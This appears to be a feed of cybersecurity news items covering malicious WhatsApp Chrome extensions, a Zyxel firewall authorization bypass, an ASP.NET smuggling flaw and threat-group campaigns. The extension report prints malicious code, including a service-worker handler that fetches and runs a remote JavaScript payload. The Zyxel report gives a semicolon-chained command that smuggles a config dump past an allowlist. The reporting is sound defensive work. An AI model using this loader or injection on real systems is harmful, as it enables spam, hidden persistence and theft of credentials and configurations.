• Over the past several months, cybersecurity researchers have observed a surge of fraudulent Chrome extensions masquerading as legitimate WhatsApp Web automation tools.

    These 131 rebranded clones, each presenting as distinct offerings, share an identical codebase designed to automate bulk messaging and scheduling without user consent.

    By injecting custom scripts directly into the WhatsApp Web interface, the extensions bypass native rate limits and anti-spam measures.

    Each listing advertises features such as message templates, scheduling controls, and analytics dashboards that appeal to small businesses, particularly in Brazil, where WhatsApp is critical for customer outreach.

    The extensions exploit Chrome’s Manifest V3 service worker capabilities to run background tasks, scheduling bulk sends without explicit user interaction.

    Chrome Web Store listings (Source – Socket.dev)

    Socket.dev analysts noted that the core module leverages a code snippet like:

    document.addEventListener('DOMContentLoaded', () => {
      const msgHelper = window.WPP.helpers.sendMessage;
      scheduledMessages.forEach(({contact, text, time}) => {
        setTimeout(() => msgHelper(contact, text), time);
      });
    });

    This injection attaches to the page’s DOM and invokes WhatsApp’s internal APIs, blurring the line between legitimate automation and malicious spamming campaigns.

    Socket.dev researchers identified that the service worker fetches a remote configuration file hosted on the operator’s infrastructure, enabling dynamic updates to message patterns and throttling parameters to evade detection.

    Despite Chrome Web Store policies prohibiting duplicate experiences and unauthorized messaging, all 131 extensions remained live as of mid-October 2025.

    Each clone is marketed under glossy landing pages with assurances of privacy compliance and rigorous code audits—claims that contradict platform guidelines.

    The extensions are distributed via a franchise-like reseller program: partners pay an upfront fee to license the tool, receive a custom branding package, and manage subscription plans while the original operator retains control over the backend.

    Evasion and Persistence Tactics

    The most sophisticated aspect of this campaign lies in its detection evasion strategy. By tuning send intervals, randomizing message content, and rotating publisher accounts, the operators maintain continuous operations despite takedown requests.

    A key persistence tactic involves polling the operator’s server for updated JavaScript payloads at regular intervals:-

    self.addEventListener('periodicsync', event => {
      event.waitUntil(
        fetch(configUrl)
          .then(response => response.json())
          .then(cfg => importScripts(cfg.payloadUrl))
      );
    });

    This Manifest V3 periodic sync registration ensures that even if Chrome flags a particular payload, the extension can reload an unflagged version from the remote server.

    Coupled with varied naming conventions and thousands of active users across listings, the campaign exemplifies policy abuse at scale and underscores the need for enhanced extension governance and user vigilance.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post 131 Malicious Extensions Targeting WhatsApp Used Found in Chrome Web Store appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • GlassWorm is the world’s first self-propagating worm targeting VS Code extensions in the OpenVSX marketplace, unleashing invisible malicious payloads and decentralized command infrastructure that make it nearly impossible to detect or dismantle. First identified on October 17, 2025, GlassWorm hijacks developer machines via invisible Unicode code, harvests credentials, drains cryptocurrency wallets, and transforms infected systems […]

    The post New GlassWorm Threat Uses Stealthy Code to Target OpenVSX Extensions appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Artificial intelligence (AI) holds tremendous promise for improving cyber defense and making the lives of security practitioners easier. It can help teams cut through alert fatigue, spot patterns faster, and bring a level of scale that human analysts alone can’t match. But realizing that potential depends on securing the systems that make it possible. Every organization experimenting with AI in

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical security flaw has been found in the on-premise edition of LANSCOPE Endpoint Manager that could let attackers run malicious code on vulnerable machines. The issue, tracked as CVE-2025-61932, involves a remote code execution vulnerability in two core components: the Client Program (MR) and the Detection Agent (DA). Customers have already seen attempts to […]

    The post LANSCOPE Endpoint Manager Flaw Allows Remote Code Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Amazon Web Services experienced a significant service disruption in its US-EAST-1 region that lasted nearly 24 hours, affecting over 140 services and causing widespread issues for customers worldwide. The outage began late on October 19, 2025, and was fully resolved by the afternoon of October 20. Root Cause Identified as DNS Resolution Issue The incident […]

    The post AWS Resolves Major Outage After Nearly 24 Hours of Service Disruption appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical vulnerability in Zyxel’s ATP and USG series firewalls that allows attackers to bypass authorization controls and access sensitive system configurations.

    Dubbed CVE-2025-9133, this flaw affects devices running firmware versions up to V5.40(ABPS.0) and enables unauthorized viewing and downloading of configs even during the two-factor authentication (2FA) process.

    Disclosed on August 14, 2025, the issue stems from inadequate command filtering in the web interface, potentially exposing credentials, keys, and network settings to remote exploitation.

    The vulnerability arises when a user with 2FA enabled logs into the device’s web portal. Normally, they must enter a one-time PIN via email or an authenticator app to proceed.

    However, before verification, the system sends semi-authenticated requests to the backend zysh-cgi binary, which handles configuration queries.

    According to Alessandro Sgreccia, who discovered the flaw parallel to CVE-2025-8078, found that attackers can manipulate these requests to inject commands, evading a whitelist that restricts access for unverified users.

    Bypassing Via Command Injection

    Using tools like Burp Suite, the researcher intercepted POST requests to /cgi-bin/zysh-cgi. These requests typically include benign commands like “show version” or “show users current,” which are whitelisted for partial authentication states (user type 0x14).

    By appending unauthorized commands with a semicolon such as “show version;show running-config” the injection tricks the system.

    The binary performs prefix-based validation, checking only the start of the string against the allowlist. If it matches, the entire command chain is forwarded to the device’s CLI parser, executing the hidden payload without further scrutiny.

    Attempts to directly access configs via export-cgi or file_upload-cgi trigger a 302 redirect to the login page, enforcing logout after failed 2FA tries.

    But the zysh-cgi endpoint lacks this protection, returning full configuration dumps in JavaScript-serialized responses (e.g., zyshdata arrays) when filter=js2 is set.

    Binary analysis of zysh-cgi revealed two execution paths based on user profile: a restricted “engine” for non-admins that skips full validation, allowing the bypass.

    Without splitting commands on semicolons or re-validating sub-parts, the flaw turns a read-only query into a full exfiltration vector.

    This authorization bypass could enable attackers to harvest passwords, API keys, and routing details, facilitating lateral movement in networks or persistence via config tampering.

    Zyxel devices, popular in enterprise and SMB environments for threat protection, amplify the risk especially since the flaw persists even with 2FA active.

    Zyxel has not yet issued a patch as of October 2025, but experts recommend immediate mitigations: disable remote web access, enforce strict firewall rules on CGI endpoints, and monitor for anomalous zysh-cgi traffic.

    For remediation, vendors should tokenize commands, validate each sub-command individually, and reject chaining entirely. Adding CSRF tokens and rate-limiting could bolster defenses.

    As cybersecurity threats evolve, this incident underscores the dangers of incomplete input sanitization in embedded systems. Organizations using Zyxel ATP/USG should audit configurations urgently to prevent data leaks.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post ZYXEL Authorization Bypass Vulnerability Let Attackers View and Download System Configuration appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • From May to August 2025, an advanced persistent threat group known as Cavalry Werewolf—also tracked as YoroTrooper and Silent Lynx—executed a sophisticated attack campaign targeting Russia’s public sector and vital industries such as energy, mining, and manufacturing. The coordinated offensive leveraged trusted relationships for highly targeted spear-phishing and deployed a custom multi-language malware arsenal, marking […]

    The post Cavalry Werewolf APT Targets Multiple Sectors Using FoalShell and StallionRAT appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft has disclosed a serious security flaw in ASP.NET Core that enables authenticated attackers to smuggle HTTP requests and evade critical protections.

    Tracked as CVE-2025-55315, the vulnerability stems from inconsistent handling of HTTP requests, a classic issue known as HTTP request/response smuggling.

    Released on October 14, 2025, this flaw affects developers relying on the popular web framework for building secure applications.

    With a CVSS v3.1 base score of 9.9 rated as “Critical” in impact the bug poses risks to confidentiality, integrity, and even limited availability of affected systems.

    The vulnerability exploits a weakness classified under CWE-444, where servers misinterpret HTTP requests, allowing attackers to inject malicious payloads.

    An authorized user with low privileges can send a crafted request over the network, bypassing front-end security controls like web application firewalls.

    This could let them hijack other users’ sessions, steal sensitive credentials, or alter server files without detection. Microsoft’s analysis highlights that successful exploitation leads to high confidentiality and integrity losses (C:H, I:H), with low availability impact (A:L), potentially causing server crashes.

    The scope changes (S:C) mean the attack ripples beyond the vulnerable component, affecting unrelated resources under different security authorities.

    Exploitation Risks In Real-World Scenarios

    Attackers need only low privileges and no user interaction, making this a low-complexity threat accessible via the network (AV:N, AC:L, PR:L, UI:N).

    While no public exploits exist yet Microsoft deems exploitation “less likely” the unproven maturity (E:U) doesn’t diminish the urgency.

    Imagine a corporate intranet where an insider crafts a smuggling request to impersonate an admin, accessing payroll data or injecting malware Or in e-commerce sites, where smuggled requests could siphon customer info during peak traffic.

    The bug hits ASP.NET Core in .NET 8 and later versions, as well as older .NET 2.3 setups using the Kestrel server. Microsoft confirms no evidence of active exploitation, but the confirmed confidence (RC:C) and official fix (RL:O) underscore immediate action.

    Developers on .NET 8+ should apply the latest Microsoft Update and restart applications. For .NET 2.3, update the Microsoft.AspNetCore.Server.Kestrel.Core package to version 2.3.6, recompile, and redeploy.

    Self-contained apps require recompilation post-update. Broader remediation involves auditing HTTP parsing in custom middleware and enabling strict request validation.

    This flaw revives concerns over HTTP smuggling, a tactic seen in past attacks on cloud services. As remote work expands attack surfaces, organizations must prioritize patching.

    Microsoft urges scanning for vulnerable deployments and monitoring logs for anomalous requests. With the framework powering millions of web apps, unpatched systems risk data breaches or compliance violations.

    Security teams should integrate this into vulnerability management workflows, especially given the framework’s role in enterprise stacks.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Critical ASP.NET Vulnerability Allows Attacker To Bypass Security Feature Remotely appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A new malware attributed to the Russia-linked hacking group known as COLDRIVER has undergone numerous developmental iterations since May 2025, suggesting an increased “operations tempo” from the threat actor. The findings come from Google Threat Intelligence Group (GTIG), which said the state-sponsored hacking crew has rapidly refined and retooled its malware arsenal merely five days following

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A European telecommunications organization is said to have been targeted by a threat actor that aligns with a China-nexus cyber espionage group known as Salt Typhoon. The organization, per Darktrace, was targeted in the first week of July 2025, with the attackers exploiting a Citrix NetScaler Gateway appliance to obtain initial access. Salt Typhoon, also known as Earth Estries, FamousSparrow,

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶